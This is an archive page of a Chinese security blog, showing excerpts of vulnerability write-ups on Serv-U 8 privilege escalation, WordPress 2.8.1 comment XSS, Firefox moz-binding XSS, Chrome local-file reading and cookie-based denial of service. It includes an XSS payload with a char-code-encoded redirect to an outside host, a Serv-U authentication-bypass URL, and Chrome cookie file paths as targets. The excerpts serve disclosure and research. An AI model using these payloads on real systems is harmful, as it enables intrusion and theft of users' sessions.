分类存档: 原创文章 - 第5页

浅谈公众短信接口安全

网站给用户发送手机短信,已经是一种流行元素,几乎各大门户网站都有给用户发短信的功能。网站发送短信一般有主动和被动两种方式。主动方式,是让用户填写自己的手机号,之后发送。被动的方式,是用户发短信给某个网站提供的号码,之后网站回复。
朋友以前做过短信服务,短信接口毕竟不是免费的,虽然成本很低,但是大量的短信,也会让有些人心疼一阵。为了节约成本,为了防止用户发恶意内容的短信(欺诈、不“绿坝”等),网站都会采取加入验证码、不允许用户控制短信内容等防御。但是总会有人疏漏很多。
抓个典型:
某大型门户网站有个功能,发送“手机游戏”的下载地址给用户的手机。

[……]

read more–>

serv-u8 本地提权

by kxlzx inbreak.net

看cnbeta发现su出8这个版本了。

想想以前写过一个7的本地提权。

不知道8有什么安全方面的更改。

下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。

 Su8的管理平台是http的,继承了su7的方式。
 抓包,分析,发现了以下路程是可以利用的。
 1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
 2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
 3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
 4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
 所以,我可以抓包然后转换成php的socket连接post出去。
 最后在用经典的ftp登陆,exec命令。达到提权。
 
 前面su7已经说了很多,这里简单的说下好了。
 …..登陆什么的。
 1,获取ID。
 2,给这个id添加权限。
 3,给这个id赋予用户名,密码,目录,权限。
 4,登陆后执行系统命令。

[……]

read more–>

sablog1.6的CSRF漏洞POC

sablog1.6的CSRF漏洞POC。

这个在我的blog中测试成功,官方下载的最新版本测试成功,但是在小泽的blog失败的。

原因是他自己修改了源程序,判断了referer。

 

[……]

read more–>

wordpress281评论显示xss漏洞

wordpress281评论显示xss漏洞

by kxlzx inbreak.net

ps:感谢鬼仔’blogXEYE’s blog协助测试。

实际上是个XSS漏洞。

 

POC

在评论的网址一栏,填写

http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

[……]

read more–>

FF3的《moz-binding: url》未限制文件扩展名导致XSS漏洞

kxlzx:因为在http://hi.baidu.com/hi_heige/的留言被百度删除了,只好在这里发篇。

http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm

看到,FF3对

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

url中的域,是有限制的。

如果配合一些web应用的功能,可以绕过这个限制。

[……]

read more–>

AJAX结合URL转发漏洞跨域提交数据

Chrome浏览器,在使用ajax的时候,通过url转发漏洞的配合,可以跨域提交数据(但是不能读取返回数据)。

IE6的某些版本(不知道是什么版本,在家里和某个网吧成功了),通过用户点“确定”后,也是可以跨域提交并接收数据的。

对于chrome这里,没办法读取目标域返回的数据,深感遗憾,所以发出来这篇文章,大家想想办法。

[……]

read more–>

利用GOOGLE的分析器做server limit dos

本文纯属YY,最后未实践成功,但是不排除其他网站有类似可能。

很多网站都使用了google的统计。

当我们从一个网站(A)链接到带有google统计的网站(B)时,google会记录referer的URI,并存入B的COOKIE中。

如果我们可以影响referer,是不是就可以攻击任何带有google统计的网站呢?

[……]

read more–>

Google Chrome使用ajax读取本地文件漏洞

google的浏览器Chrome1.0.154.53(目前最新),存在ajax读取本地文件漏洞。

利用该漏洞可以读取本地文本文件,并提交出来。

而Chrome的cookie默认保存在“C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”

Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"

读取这个文件,然后提交,前提是文件在本地打开,但是如何欺骗用户在本地打开呢?

[……]

read more–>

server limit dos利用随想

看了墨西哥同学(其实看不懂,刺帮忙翻译的)和刺的文章,不过我们主要关心该技术的利用。

sirdarckcat的文章 说,HTTP头的长度,在APACHEweb服务器是有一定的要求的,如果超出一定长度,会产生服务器错误。HTTP头里面,有cookie,有location,有host。。。如果我们可以控制其中一个(例如cookie),给用户植入大长度的cookie,就会出现用户访问该域下所有的请求,都带上大长度cookie,导致用户不管访问域名下的哪个文件,都会产生服务器错误,造成客户端无法访问

本文讲这个东西具体的利用。

[……]

read more–>

IT168 安全技术大赛09年新年版设计者的总结

by 空虚浪子心

PS:这次大赛就要完了,没有过关的朋友,可以看这个,或者到论坛看通关文档。

  【IT168专稿】在整个游戏关卡中,所有用到的技术,都是比较基础的,只要有自己的思想,又懂得基本黑客技术,花点时间,很容易过关。整个设计思想是:要求过关者用自己的真实技术,不借助全自动工具,熟悉基本的web黑客攻击技术,肯动脑。关卡尽量切合实际,使用技术尽量不重复。在关卡开始之初,预计要拿host文件这东西,挡住一部分人,让哪些没耐心的,不愿意动脑的人,先去清醒下,过段时间再来玩。

[……]

read more–>